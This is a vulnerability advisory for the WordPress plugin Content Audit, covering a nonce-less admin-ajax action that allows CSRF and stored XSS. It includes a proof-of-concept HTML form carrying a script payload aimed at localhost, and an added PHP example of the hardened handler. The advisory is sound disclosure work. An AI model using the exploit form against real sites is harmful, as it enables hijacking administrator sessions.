Advisory:

CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almost anything an admin can

Vulnerability

The plugin registers an admin-ajax action that is not protected by a nonce, so any site a logged-in administrator visits can submit the request on their behalf (CSRF). One of the submitted values is later rendered unescaped on the pages list screen, giving stored XSS.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability:

  Score:            5.8 (Medium)
  Vector:           Network
  Complexity:       Medium
  Authentication:   None
  Confidentiality:  Partial
  Integrity:        Partial
  Availability:     None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

  1. Install/activate the plugin
  2. Make sure you have a post with ID=2 (or edit the HTML provided below)
  3. Settings > Content Audit > select at least “Pages” for “Audited content types”
  4. Visit a page containing the below HTML
  5. Click submit
  6. Visit http://localhost/wp-admin/edit.php?post_type=page to receive the XSS payload

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=content_audit_save_bulk_edit">
 <input type="text" name="post_ids[]" value="2">
 <input type="text" name="_content_audit_owner" value="Elliot Alderson">
 <input type="text" name="_content_audit_expiration_date" value="2020-01-01">
 <input type="text" name="_content_audit_notes" value="&lt;script>alert(1)&lt;/script>">
 <input type="submit">
</form>
Advisory timeline

  • 2017-08-21: Discovered
  • 2017-09-08: Reported to vendor by email
  • 2017-09-08: First response from vendor
  • 2017-09-08: Vendor reports fixed in 1.9.2
  • 2017-09-26: Advisory published
  • 2017-09-26: Requested CVE

Mitigation/further actions

Upgrade to version 1.9.2 or later.
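For readers maintaining similar plugins, the following is an added illustration of the two defects the advisory describes and the standard WordPress fixes for them. It is not the Content Audit plugin's own code: the hook names, nonce action, column name and function names are assumed; only the meta keys come from the proof of concept above.

```php
<?php
// Added example, not Content Audit's code. Names below are hypothetical.

// Vulnerable pattern as described in the advisory: no nonce, no capability
// check, and the submitted value is stored verbatim.
function example_save_bulk_edit_vulnerable() {
    foreach ( (array) $_POST['post_ids'] as $post_id ) {
        update_post_meta( (int) $post_id, '_content_audit_notes', $_POST['_content_audit_notes'] );
    }
    wp_die();
}

// Hardened pattern.
function example_save_bulk_edit_hardened() {
    // 1. CSRF: require a nonce bound to this action and the logged-in user.
    //    A form on an attacker-controlled site cannot obtain a valid one.
    check_ajax_referer( 'example_bulk_edit', 'nonce' );

    // 2. Authorisation and input handling: cast IDs, sanitise text fields,
    //    and check the current user may edit each post.
    $post_ids = array_map( 'intval', (array) ( $_POST['post_ids'] ?? array() ) );
    $notes    = sanitize_textarea_field( wp_unslash( $_POST['_content_audit_notes'] ?? '' ) );
    $owner    = sanitize_text_field( wp_unslash( $_POST['_content_audit_owner'] ?? '' ) );

    foreach ( $post_ids as $post_id ) {
        if ( ! current_user_can( 'edit_post', $post_id ) ) {
            continue;
        }
        update_post_meta( $post_id, '_content_audit_notes', $notes );
        update_post_meta( $post_id, '_content_audit_owner', $owner );
    }
    wp_send_json_success();
}
// Only wp_ajax_ (not wp_ajax_nopriv_) so anonymous requests are rejected outright.
add_action( 'wp_ajax_example_save_bulk_edit', 'example_save_bulk_edit_hardened' );

// 3. XSS: escape on output regardless of what is stored. This renders the
//    notes in a custom column of the pages list table (the screen the PoC
//    targets).
function example_render_notes_column( $column, $post_id ) {
    if ( 'example_notes' === $column ) {
        echo esc_html( get_post_meta( $post_id, '_content_audit_notes', true ) );
    }
}
add_action( 'manage_page_posts_custom_column', 'example_render_notes_column', 10, 2 );

// The admin page emits the nonce with wp_create_nonce( 'example_bulk_edit' )
// and the JavaScript sends it as the "nonce" field of the AJAX request.
```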